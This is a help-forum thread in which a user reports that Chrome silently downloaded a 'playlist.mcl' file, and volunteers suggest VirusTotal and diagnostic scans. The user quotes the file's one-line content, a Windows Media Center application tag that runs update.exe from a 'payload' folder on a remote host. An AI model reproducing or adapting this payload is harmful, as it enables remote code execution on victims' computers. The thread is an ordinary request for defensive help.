.mcl Virus?

[REDACTED]

I was on Google Chrome, when suddenly and randomly a file named "playlist.mcl" notified as downloaded at the bottom of the screen. I closed Chrome immediately.

I copied it to an old laptop and opened it with Notepad. When opened in notepad it reads:

<application run="\\XX.XX.XX.XX(I have removed the numbers in case they amount to personal info, don't know what they are)\Users\Administrator\Desktop\payload\update.exe"/>

It says .mcl is a file type associated with Windows Media Center.

I hope I've done the right (read: okay) thing so far, but was very shocked that Chrome downloaded this without my permission and don't know what to do now.

[REDACTED]

Hi,

Try to send : http://www.virustotal.com and paste the link

[REDACTED]

Not sure what you mean. I assume you mean run the scan on that site and post the results?
I'm scared to open Chrome!

[REDACTED]

Okay, I tested it on the site you mentioned.

It seems to think it is fine (lots of green ticks), but it evidently isn't.

Interestingly, it says the same file has been submitted before: the last time being 5 hours ago -- but the first time it was ever submitted? Only 1 day, 1 hour ago!

[Pondus]

can you post the virustotal scan link

[REDACTED]

Oops, sorry.

https://www.virustotal.com/en/file/109033ce16380349c2984abdf9b30585ebda54687fdea48c2c282089551bdb27/analysis/1444772382/

[REDACTED]

The part that worries me the most is how it downloaded itself like that!

[Pondus]

seems ok, was you on any music / video download site?     


if you want a check ....


Instructions  https://forum.avast.com/index.php?topic=53253.0
Attach Malwarebytes and Farbar Recovery Scan Tool logs ....  3 logs total


See below the box you write in ... Attachments and other options


malware expert team will be online tomorrow and assist you

[REDACTED]

I had a lot of tabs open, but nothing out of the ordinary, no music or video download site, unless you count YouTube as one!

I will try those scans, but removing this file itself is easy. I want to know how it downloaded itself most of all, I didn't know that was possible!

[REDACTED]

http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/

I feel like this is relevant. I think the file isn't being picked up as problematic or malicious because it is normally a harmless file type...

[REDACTED]

Here's the Malwarebytes one...

[REDACTED]

Just checking I'm supposed to post the next ones (FRST.txt and Addition.txt) here, it looks like information that shouldn't be shared, but I don't know anything.

[mikaelrask]

hey lupin yes please also attach the logs from frst+addation. A malwre expert will help you from there

[Pondus]

When malware expert is done you can edit post and delete logs if you want

[REDACTED]

Okay, here they are.
I have removed a couple of unrelated personal documents from one of them, but otherwise kept them as is.

I hope they help figure out the situation.